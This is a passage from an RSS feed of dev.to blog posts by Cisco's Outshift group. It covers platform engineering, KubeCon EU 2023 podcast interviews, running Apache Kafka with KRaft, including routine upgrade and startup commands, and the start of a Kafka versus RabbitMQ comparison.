  Is platform engineering DevOps 2.0?
&lt;/h2&gt;

&lt;p&gt;Where all the articles, threads, and posts seem to converge (if you scroll far enough) is that to truly fulfill the DevOps “agenda”—ensuring that developers are writing software that runs well on its intended infrastructure—companies should be building standard infrastructure and self-service interfaces. Providing developers with digital platforms that deliver software at scale would empower them to build high-quality applications without becoming operations experts. Who would build and maintain these platforms? Dedicated platform-engineering teams. &lt;/p&gt;

&lt;p&gt;In August of last year, Gartner put platform engineering on its &lt;a href="https://www.gartner.com/en/articles/what-s-new-in-the-2022-gartner-hype-cycle-for-emerging-technologies"&gt;Gartner Hype Cycle for Emerging Technologies&lt;/a&gt;, defining it as “the discipline of building and operating self-service Internal Developer Platforms (IDPs) for software delivery and life cycle management.” (Side note: platform engineering actually predates DevOps, having emerged in the early 2000s.)&lt;/p&gt;

&lt;p&gt;If you return to Sid Palas’ Twitter thread, you’ll start feeling a sense of déjà vu. “The challenge then becomes moving up the control axis without exiting the Developer Comfort Zone. This is where platform engineering comes into play!” he wrote. “Platform engineers build the tooling and abstractions around the complex infrastructure configurations such that most software engineers don't need to worry about those aspects as much. The resulting system is what is known as an ‘Internal Developer Platform’ (IDP).” Mic drop! &lt;/p&gt;

&lt;p&gt;If you feel a bit dizzy, join the club. There is a wide array of personalities chiming in on this conversation, and as many ways of slicing and dicing the same issues. &lt;/p&gt;

&lt;p&gt;That said, let me return to answering the question I posed in this post’s headline. In my quest to decide whether to run out and buy a new black dress to mourn the passing of DevOps, I considered the entire range of opinions, from the experts at Gartner to the rabble-rousers on Reddit. At the end of the day, the conclusion seems clear: no, DevOps isn’t dead. It’s just growing up. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;center&gt;We'd love to meet you. &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;Connect with Outshift on Slack&lt;/a&gt;!&lt;/center&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>platformengineering</category>
    </item>
    <item>
      <title>Live from Amsterdam: CloudUnfiltered's Exclusive Interviews at KubeCon + CloudNativeCon Europe 2023</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Thu, 20 Apr 2023 21:44:26 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/live-from-amsterdam-cloudunfiltereds-exclusive-interviews-at-kubecon-cloudnativecon-europe-2023-52nh</link>
      <guid>https://dev.to/ciscoemerge/live-from-amsterdam-cloudunfiltereds-exclusive-interviews-at-kubecon-cloudnativecon-europe-2023-52nh</guid>
      <description>&lt;p&gt;Hosted by Michael Chenetz—Product Marketing Leader, Product Led Growth, Emerging Technologies &amp;amp; Incubations Group, Cisco—the &lt;strong&gt;CloudUnfiltered Podcast&lt;/strong&gt; is live at KubeCon + Cloud NativeCon EU 2023, conducting a series of exciting interviews with leading experts from the worlds of Kubernetes, cloud, and open source. Enjoy!&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Cortney Nickerson and Wito Delnat: Monokle, Developer Tools, and Making Kubernetes More Accessible.&lt;/strong&gt; Mike interviews Kubeshop's Cortney Nickerson, Developer Advocate,  and Wito Delnat, Lead Software Engineer.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Kubeshop's mission is to build a thriving open source ecosystem and pipeline of next-generation Kubernetes and cloud native products and projects.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/wLvMHYBKoBQ"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Márk Sági-Kazár on Innovation and Emerging Technology.&lt;/strong&gt; Mike interviews Márk Sági-Kazár, Cisco's Open Source Technology Lead and Ambassador for the Cloud Native Computing Foundation.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/zl6xasJyTaQ"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Google’s Nicholas Eberts and Mike Ensor on Google Kubernetes Engine.&lt;/strong&gt; Mike interviews Google's Nick Eberts, Enterprise Application Modernization Engineer, and Mike Ensor, Senior Distributed Cloud Solution Architect. &lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/3ZssXFdm3Wk"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Phil Estes on the Irony of Big Tech Running to Catch up with OSS.&lt;/strong&gt; Mike interviews Phil Estes, Principal Engineer at Amazon Web Services (AWS). &lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/Ppf78DgRDho"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Matt Jarvis on Supply-Chain Security.&lt;/strong&gt; Mike interviews Matt Jarvis, Developer Relations, Snyk/Vice Chair, OpenUK/Ambassador, Cloud Native Computing Foundation (CNCF). &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Snyk is a platform that allows you to scan, prioritize, and fix security vulnerabilities in your own code, open source dependencies, container images, and infrastructure as code (IaC).&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/sBAbVQdJ3Ew"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Panel Discussion: Community, Caring, and Inclusiveness.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Featuring:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kim McMahon&lt;/strong&gt;, Product Marketing Leader, Product Led Growth, Emerging Technologies &amp;amp; Incubations Group, Cisco.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bart Farrell&lt;/strong&gt;, Cloud Native Community Consultant/Content Creator/CNCF Ambassador, Data on Kubernetes (DoK). Bart helps tech companies expand their audience through content that stands out from the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lisa-Marie Namphy&lt;/strong&gt;, Head of Developer Relations, Cockroach Labs. Cockroach Labs is the company behind CockroachDB, the cloud native, distributed SQL database that provides next-level consistency, ultra-resilience, data locality, and massive scale to modern cloud applications.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sharone Zitzman&lt;/strong&gt;, Chief Manual Reader, RTFM Please. RTFM Please provides the full lifecycle of services for developer-focused marketing—empowering internal engineering groups to tell their engineering stories through improved developer experience.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/P3K72JqePSk"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Alex Jones Shares the Deets on K8sGPT.&lt;/strong&gt; Mike interviews Alex Jones, Founder of k8sgpt.ai/Director of Kubernetes Engineering at Canonical Ltd./Tech Lead, TAG App Delivery, CNCF. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Canonical Ltd. is a UK-based privately held computer software company founded and funded by South African entrepreneur Mark Shuttleworth to market commercial support and related services for Ubuntu and related projects.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/hNjhmDpGLPo"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Acorn Labs’ Shannon Williams and Darren Shepherd on Simplifying Kubernetes App Development.&lt;/strong&gt; Mike interviews Shannon Williams, Co-founder, Acorn Labs/Co-founder and President, Rancher Labs, together with Darren Shepherd, Chief Architect and Co-founder, Acorn Labs/Founder and Chief Architect, Rancher Labs.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Acorn simplifies app deployment on Kubernetes by introducing a standardized application artifact that runs consistently across dev, test, and production environments. Rancher Labs provides an open source container management software for enterprises. It leverages containers to accelerate software development and improve IT operations.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/hIP6GtdKmIU"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Dinesh Majrekar on the Origins of Civo, the Cloud Native Service Provider.&lt;/strong&gt; Mike interviews Dinesh Majrekar, CTO at Civo.com. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Civo is a cloud native service provider enabling companies to host core applications with ease, helping speed up development, increase productivity, and reduce costs.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/S5peYc7ykTM"&gt;
&lt;/iframe&gt;
 &lt;/p&gt;



&lt;p&gt;&lt;strong&gt;Loris Degioanni and Sysdig: The Origin Story.&lt;/strong&gt; Mike interviews Loris Degioanni, CTO and Founder at Sysdig.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Sysdig provides security and visibility to confidently run containers, Kubernetes, and cloud services. Its platform is built on open standards (Falco and Sysdig OSS) and offers a single view of risk across cloud services, containers, and hosts.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/ZtrWLOBUTzU"&gt;
&lt;/iframe&gt;
 &lt;/p&gt;



&lt;p&gt;&lt;strong&gt;David Magton on Cloud-Native Consulting and Managed Services.&lt;/strong&gt; Mike interviews David Magton, CEO of Palark GmbH.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Palark is an all-in-one DevOps &amp;amp; SRE service provider based in Germany that helps organizations of all sizes build, deploy, and operate software quickly, efficiently and securely.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/-XxdEHYCJC4"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Frederick Kautz on Zero Trust and “Shift-Left” Security.&lt;/strong&gt; Mike interviews Frederick Kautz, Co-Chair, KubeCon NA 2022/Cloud Native Infra and Security Enterprise Architect, Carelon. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Carelon offers care models designed to simplify the navigation and management of complex health conditions, platform-based digital tools that connect the healthcare ecosystem for more powerful and accessible information, and convenient services such as home prescription delivery and virtual care.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/4kLS4WkYPKg"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The Continued Relevance of Java in a Containerized World.&lt;/strong&gt; Mike interviews the legendary Arun Gupta, author and Vice President and General Manager for Open Ecosystem at Intel.  &lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/xDVdPvo94KQ"&gt;
&lt;/iframe&gt;
&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Enabling Women's Success in Technology.&lt;/strong&gt; Mike interviews superstar Katie Gamanji, winner of the WITAwards and TechWomen100, about hot tech topics and women in technology. &lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/WOhRRT5y3pQ"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;center&gt;We'd love to meet you. &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA"&gt;Connect with Outshift on Slack&lt;/a&gt;!&lt;/center&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubeconeu2023</category>
      <category>cloudnativeconeu2023</category>
      <category>kubernetes</category>
      <category>cloud</category>
    </item>
    <item>
      <title>It’s Time to Break Out of the Zoo: Running Apache Kafka® without ZooKeeper™</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Mon, 03 Apr 2023 23:03:16 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/its-time-to-break-out-of-the-zoo-running-apache-kafkar-without-zookeeper-1nh0</link>
      <guid>https://dev.to/ciscoemerge/its-time-to-break-out-of-the-zoo-running-apache-kafkar-without-zookeeper-1nh0</guid>
      <description>&lt;p&gt;Have you ever heard the Simon and Garfunkel song “&lt;a href="https://www.youtube.com/watch?v=6xKLBne1CoI" rel="noopener noreferrer"&gt;At the Zoo&lt;/a&gt;?” The lyrics begin, “Someone told me it’s all happening at the zoo.” Well, if you’re talking about Apache Kafka®, it’s the exact opposite: the zookeeper has retired and gone home to watch Netflix. &lt;/p&gt;

&lt;p&gt;In October of 2022, the Apache Software Foundation released Kafka 3.3.1—the first release that included a production-ready version of the KRaft (Kafka Raft) consensus protocol. This simplifies Kafka management by eliminating the need to use Apache ZooKeeper™ to manage and secure a Kafka deployment. (Note: Kafka 3.4 provides for migration from ZooKeeper to KRaft. ZooKeeper is deprecated in 3.4, and Apache plans to remove it completely in version 4.0.)&lt;/p&gt;

&lt;h2&gt;
  
  
  The KRaft advantage
&lt;/h2&gt;

&lt;p&gt;There are a number of reasons why it made sense for Apache to deprecate ZooKeeper: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;It's much more convenient to use one component instead of two. &lt;/li&gt;
&lt;li&gt;Kafka clusters support up to 200,000 partitions. Adding Kafka brokers to or removing them from a cluster forces new leader elections, which can overload ZooKeeper and (temporarily) slow performance to a crawl. KRaft mitigates this scale problem.&lt;/li&gt;
&lt;li&gt;ZooKeeper’s metadata can sometimes become out of sync with Kafka’s cluster metadata. &lt;/li&gt;
&lt;li&gt;ZooKeeper’s security lags behind Kafka’s. &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Enter KRaft.&lt;/p&gt;

&lt;p&gt;KRaft is an event-based version of the &lt;a href="https://raft.github.io/raft.pdf" rel="noopener noreferrer"&gt;Raft consensus algorithm&lt;/a&gt;. It uses an event log to store the state, periodically adding snapshots to save storage space. Because the state data lives in Kafka's own metadata topic—rather than being retrieved from a separate tool—worst-case recovery time improves dramatically, shrinking the window of unavailability. KRaft can also handle a much larger number of partitions per cluster.&lt;/p&gt;
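To make the event-log-plus-snapshots idea concrete, here's a toy Python sketch (a hypothetical model, not Kafka's actual internals): state is rebuilt from the last snapshot plus only the events appended since, so a restarting controller doesn't have to replay the whole log.

```python
# Toy model of an event log with periodic snapshots (illustrative only,
# not Kafka's implementation).

class MetadataLog:
    def __init__(self, snapshot_interval=3):
        self.events = []            # append-only event log
        self.snapshot = {}          # state folded in from older events
        self.snapshot_offset = 0    # events before this offset live in the snapshot
        self.snapshot_interval = snapshot_interval

    def append(self, key, value):
        self.events.append((key, value))
        # Periodically fold old events into the snapshot to save storage.
        if len(self.events) - self.snapshot_offset >= self.snapshot_interval:
            self.take_snapshot()

    def take_snapshot(self):
        for key, value in self.events[self.snapshot_offset:]:
            self.snapshot[key] = value
        self.snapshot_offset = len(self.events)

    def recover(self):
        # Recovery = snapshot + replay of only the events newer than it.
        state = dict(self.snapshot)
        for key, value in self.events[self.snapshot_offset:]:
            state[key] = value
        return state

log = MetadataLog()
log.append("topic.orders.partitions", 3)
log.append("topic.orders.partitions", 6)
log.append("broker.1.status", "online")
log.append("broker.2.status", "online")
print(log.recover())
```

After four appends with a snapshot interval of three, recovery replays just one event on top of the snapshot instead of the whole log.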

&lt;h2&gt;
  
  
  How it works
&lt;/h2&gt;

&lt;p&gt;KRaft uses multiple quorum controllers to manage Kafka metadata. When the KRaft quorum controllers start up, they designate a leader within the group. The leader is responsible for receiving updates from brokers and making metadata changes. The other quorum controllers, called "followers,” replicate the leader's state and metadata changes. This ensures that all quorum controllers have consistent metadata.&lt;/p&gt;

&lt;p&gt;When a metadata change occurs, the leader broadcasts the change to all of the follower controllers. The followers acknowledge the change and apply it to their own metadata states. If a follower fails to acknowledge the change, the leader will retry until a quorum of followers acknowledges the change. This process provides a more resilient and fault-tolerant approach to metadata management than the ZooKeeper-based architecture provides.&lt;/p&gt;
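The leader-and-followers flow above can be illustrated with a heavily simplified Python sketch. This is a toy model only: real KRaft adds Raft terms, log indexes, leader elections, and network retries, none of which appear here.

```python
# Toy illustration of quorum-based metadata replication (heavily simplified;
# real KRaft uses the full Raft protocol with terms, indexes, and elections).

class Follower:
    def __init__(self, name, healthy=True):
        self.name = name
        self.healthy = healthy
        self.metadata = {}

    def apply(self, change):
        if not self.healthy:
            return False            # a failed follower cannot acknowledge
        self.metadata.update(change)
        return True                 # acknowledgment back to the leader

class Leader:
    def __init__(self, followers):
        self.followers = followers
        self.metadata = {}

    def commit(self, change):
        # A change is committed once a majority of controllers acknowledges it.
        acks = 1  # the leader counts itself
        for follower in self.followers:
            if follower.apply(change):
                acks += 1
        quorum = (len(self.followers) + 1) // 2 + 1
        if acks >= quorum:
            self.metadata.update(change)
            return True
        return False

followers = [Follower("f1"), Follower("f2"), Follower("f3", healthy=False)]
leader = Leader(followers)
committed = leader.commit({"topic.orders.leader": "broker-2"})
print(committed)  # True: 3 of 4 controllers acknowledged, a majority
```

Even with one follower down, the change commits because a majority of the quorum acknowledged it; that is the fault tolerance the paragraph above describes.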

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fry2yn0lwvncrg8dma7xp.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fry2yn0lwvncrg8dma7xp.jpg" alt="Diagram showing how KRaft takes periodic snapshots of the metadata states"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Other benefits of Kafka with KRaft include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Improved scalability&lt;/strong&gt;: KRaft allows Kafka brokers to scale horizontally, allowing for better distribution of workload.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Improved message delivery reliability:&lt;/strong&gt; KRaft provides more consistent replication and message delivery guarantees, reducing the risk of data loss or corruption.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simplified configuration management&lt;/strong&gt;: KRaft reduces the administrative overhead of managing large Kafka deployments.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Improved security features:&lt;/strong&gt; This new and improved version of Kafka comes with support for TLS 1.3, authentication using OAuth 2.0, and support for Java 11.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  How to upgrade to and configure Kafka 3.4 with KRaft
&lt;/h2&gt;

&lt;p&gt;The Apache.org Kafka &lt;a href="https://kafka.apache.org/documentation/#upgrade" rel="noopener noreferrer"&gt;documentation&lt;/a&gt; describes how to upgrade to Kafka version 3.4.0 from previous versions of Kafka through 3.3.x, as well as how to upgrade a KRaft-based cluster to 3.4.0 from any version of Kafka from 3.0.x through 3.3.x. Both appear below (copied &lt;em&gt;mostly&lt;/em&gt; verbatim—with the omission of instructions for upgrading versions prior to 2.1.x—for your convenience). If you are upgrading from a version prior to 2.1.x, I recommend visiting the documentation link above, since it’s a bit more complicated and may impact performance. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For a rolling upgrade to 3.4.0 from a Kafka version using ZooKeeper:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Update &lt;code&gt;server.properties&lt;/code&gt; on all brokers and add the following properties:  &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Set &lt;code&gt;inter.broker.protocol.version&lt;/code&gt;=CURRENT_KAFKA_VERSION (CURRENT_KAFKA_VERSION refers to the version you are upgrading from, e.g., 3.3, 3.2, etc.)
&lt;/li&gt;
&lt;li&gt;Upgrade the brokers one at a time: shut down the broker, install the new version of Kafka, then restart it. Once you have done so, the brokers will be running the latest version and you can verify that the cluster's behavior and performance meets expectations. It is still possible to downgrade at this point if there are any problems.&lt;/li&gt;
&lt;li&gt;Once the cluster's behavior and performance has been verified, bump the protocol version by editing &lt;code&gt;inter.broker.protocol.version&lt;/code&gt; and setting it to 3.4.&lt;/li&gt;
&lt;li&gt;Restart the brokers one by one for the new protocol version to take effect. Once the brokers begin using the latest protocol version, it will no longer be possible to downgrade the cluster to an older version.&lt;/li&gt;
&lt;/ol&gt;
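As a sketch of step 3, here's one way to bump the protocol version in &lt;code&gt;server.properties&lt;/code&gt;. The file path and the use of sed are assumptions for illustration; any editor works, and your real properties file will have many more entries.

```shell
# Illustrative only: bump inter.broker.protocol.version in a throwaway copy
# of server.properties. The path and the sed approach are assumptions.
mkdir -p /tmp/kafka-demo
cat > /tmp/kafka-demo/server.properties <<'EOF'
broker.id=0
inter.broker.protocol.version=3.3
log.dirs=/var/lib/kafka
EOF

# Step 3 of the rolling upgrade: set the protocol version to 3.4.
sed -i 's/^inter\.broker\.protocol\.version=.*/inter.broker.protocol.version=3.4/' \
  /tmp/kafka-demo/server.properties

grep '^inter.broker.protocol.version' /tmp/kafka-demo/server.properties
```

(Note: on macOS/BSD, `sed -i` needs a backup suffix argument, e.g. `sed -i ''`.) Remember that this edit takes effect only after the rolling restart in step 4, and that the restart is one-way: once brokers speak 3.4, you can't downgrade.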

&lt;p&gt;&lt;strong&gt;Upgrading a KRaft-based cluster to 3.4.0 from any version 3.0.x through 3.3.x&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you are upgrading from a version prior to 3.3.0, please note that once you have changed the &lt;code&gt;metadata.version&lt;/code&gt; to the latest version, it will not be possible to downgrade to a version prior to 3.3-IV0. Please refer to the &lt;a href="https://kafka.apache.org/documentation/#upgrade_kraft_3_4_0" rel="noopener noreferrer"&gt;Apache documentation&lt;/a&gt; for more information. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For a rolling upgrade:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Upgrade the brokers one at a time: shut down the broker, update the code, and restart it. Once you have done so, the brokers will be running the latest version and you can verify that the cluster's behavior and performance meets expectations.&lt;/li&gt;
&lt;li&gt;Once the cluster's behavior and performance has been verified, bump the &lt;code&gt;metadata.version&lt;/code&gt; by running &lt;code&gt;./bin/kafka-features.sh upgrade --metadata 3.4&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Running Kafka with KRaft
&lt;/h2&gt;

&lt;p&gt;Once you’ve upgraded Kafka to leverage KRaft, it’s time to start it up and set up your clusters. Here’s the rundown, again, courtesy of the &lt;a href="https://kafka.apache.org/documentation/#quickstart_startserver" rel="noopener noreferrer"&gt;Apache documentation&lt;/a&gt;. (Note: Your local environment must have Java 8+ installed.)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s how to get started:&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;First, generate a cluster UUID:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ KAFKA_CLUSTER_ID="$(bin/kafka-storage.sh random-uuid)"


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Next, format the log directories: &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ bin/kafka-storage.sh format -t $KAFKA_CLUSTER_ID -c config/kraft/server.properties


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Finally, start the Kafka server:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ bin/kafka-server-start.sh config/kraft/server.properties


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Once the Kafka server has successfully launched, you will have a basic Kafka environment running and ready to use. From there, you’ll set up your topics, write/read events into/from the topics, and continue on your merry way.  &lt;/p&gt;
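Sticking with the Apache quickstart, the next steps look roughly like this. Run them in a second terminal against the broker you just started; the topic name is just an example.

```shell
# Create a topic (the name "quickstart-events" is just an example):
bin/kafka-topics.sh --create --topic quickstart-events --bootstrap-server localhost:9092

# Write a few events into the topic (type lines, then Ctrl-C to stop):
bin/kafka-console-producer.sh --topic quickstart-events --bootstrap-server localhost:9092

# Read the events back from the beginning (Ctrl-C to stop):
bin/kafka-console-consumer.sh --topic quickstart-events --from-beginning --bootstrap-server localhost:9092
```

These commands require the running broker from the steps above, so treat them as a template rather than something to paste blindly.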

&lt;p&gt;&lt;small&gt;&lt;center&gt;&lt;em&gt;We'd love to meet you. &lt;a href="https://join.slack.com/t/outshift/shared_invite/zt-1rw2jl0ht-yNdyFgBFlc~yzo9AnE4FbA" rel="noopener noreferrer"&gt;Connect with Outshift on Slack&lt;/a&gt;!&lt;/em&gt;&lt;/center&gt;&lt;/small&gt;&lt;/p&gt;

</description>
      <category>kafka</category>
      <category>zookeeper</category>
      <category>kraft</category>
    </item>
    <item>
      <title>Apache Kafka® vs. RabbitMQ™: Battle of the (Message) Brokers</title>
      <dc:creator>Brianna Blacet</dc:creator>
      <pubDate>Thu, 23 Mar 2023 03:33:00 +0000</pubDate>
      <link>https://dev.to/ciscoemerge/apache-kafkar-vs-rabbitmq-battle-of-the-message-brokers-378f</link>
      <guid>https://dev.to/ciscoemerge/apache-kafkar-vs-rabbitmq-battle-of-the-message-brokers-378f</guid>
      <description>&lt;p&gt;Apache Kafka® and RabbitMQ™ are both popular messaging systems—each with its respective strengths, weaknesses, and ideal use cases. So, how should you decide what’s right for your applications and environment? &lt;/p&gt;

&lt;p&gt;In this blog, we’ll break down the key differences between these two streaming platforms, describe the best use cases for each one, and give examples of some large enterprises who are leveraging one or the other (or both) for their applications.&lt;/p&gt;

&lt;h2&gt;
  
  
  Comparing architectures, protocols, and scalability
&lt;/h2&gt;

&lt;p&gt;First off, it’s important to distinguish between these two platforms’ architecture. Kafka is a distributed broadcast-style message broker that does not rely on a message queue; instead, it uses an append-only log. It saves messages to disk, appending to the log for consumers to read until the configured retention limit is reached. Because the data persists, subscribers can go back in time to consume it (think of a newsfeed, where some people post and others read the posts as they appear or scroll back to read them later). Kafka also lets users batch messages, which allows for higher throughput. &lt;/p&gt;

&lt;p&gt;In contrast, RabbitMQ is a message broker designed to validate, route, and store communication between applications and services. Like a human translator, it lets these parties speak directly to each other, regardless of the languages they use or the platforms on which they are running. Unlike Kafka, RabbitMQ deletes messages after completing their delivery. &lt;/p&gt;

&lt;p&gt;Kafka organizes messages in what it calls “topics.” A topic holds information that logically belongs together. An example might be “payment_processed.” Topics can be consumed by one or more consumers, which might live in different domains. This information may be consumed by “shipping_consumer,” for example, and later by “notification_consumer.” When a subscriber consumes a message, its offset advances past it, but, as mentioned earlier, Kafka does not delete the data. &lt;/p&gt;
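Those semantics can be sketched in a few lines of Python. This is a toy model, not a Kafka client: messages stay in the log, and each consumer merely tracks its own read position.

```python
# Toy model of a Kafka-style topic: an append-only log with per-consumer
# offsets. Messages are never deleted on read; each consumer just advances
# its own position in the log.

class Topic:
    def __init__(self):
        self.log = []       # append-only message log
        self.offsets = {}   # consumer name -> next position to read

    def publish(self, message):
        self.log.append(message)

    def poll(self, consumer):
        start = self.offsets.get(consumer, 0)
        self.offsets[consumer] = len(self.log)
        return self.log[start:]   # the log itself is untouched

topic = Topic()
topic.publish("payment_processed: order 1001")
topic.publish("payment_processed: order 1002")

print(topic.poll("shipping_consumer"))      # both messages
topic.publish("payment_processed: order 1003")
print(topic.poll("shipping_consumer"))      # only the new message
print(topic.poll("notification_consumer"))  # all three, from the beginning
```

Note how "notification_consumer" can show up late and still read everything from the beginning: that is what the persistent log buys you.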

&lt;p&gt;RabbitMQ is designed to handle message-based communication between applications and is optimized for quick, reliable message delivery to one consumer at a time, asynchronously. A great non-digital analog might be Starbucks. You place your order with the barista (analogous to a broker), who is processing multiple orders. You don’t receive your order immediately. Instead, you wait in a queue with other customers. When your order is complete, your cup is delivered with only one name on it—yours. In other words, this one barista serves multiple customers, delivering their individual orders, one at a time. &lt;/p&gt;
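The Starbucks analogy translates into a queue sketch like the one below. Again, this is a toy model (real RabbitMQ adds exchanges, routing keys, and acknowledgments); it only shows the delivery semantics: each message goes to exactly one consumer and is gone once delivered.

```python
from collections import deque

# Toy model of a RabbitMQ-style work queue: each message is delivered to
# exactly one consumer and removed from the queue afterward (illustrative
# only; real RabbitMQ adds acknowledgments, exchanges, and routing).

class WorkQueue:
    def __init__(self):
        self.queue = deque()

    def publish(self, message):
        self.queue.append(message)

    def deliver(self, consumers):
        # One message per consumer, like orders handed over the counter.
        deliveries = {}
        for consumer in consumers:
            if self.queue:
                deliveries[consumer] = self.queue.popleft()
        return deliveries

orders = WorkQueue()
orders.publish("latte for Alice")
orders.publish("espresso for Bob")

delivered = orders.deliver(["barista_station_1", "barista_station_2"])
print(delivered)
print(len(orders.queue))  # 0: messages are gone after delivery
```

Contrast this with the Kafka-style log: here a late-arriving consumer finds an empty queue, because delivery consumed the messages.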

&lt;p&gt;Both of these messaging platforms are scalable. Kafka’s distributed architecture gives it the advantage when it comes to throughput and processing speed. The difference isn’t trivial: Kafka can handle millions of messages per second. RabbitMQ—which allows you to create a structured architecture for publishers and consumers and can be configured to have nodes devoted to specific queues (each processed by only one consumer, as in the Starbucks example)—can handle hundreds of thousands of messages per second. &lt;/p&gt;

&lt;h2&gt;
  
  
  Which platform will meet your specific needs?
&lt;/h2&gt;

&lt;p&gt;RabbitMQ and Kafka shine in different areas, so your choice should depend on your organization’s use cases. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here are some of the best use cases for Kafka:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Applications in industries such as finance, healthcare, and e-commerce. All of these require high-volume, real-time data streams, which is where Kafka excels.&lt;/li&gt;
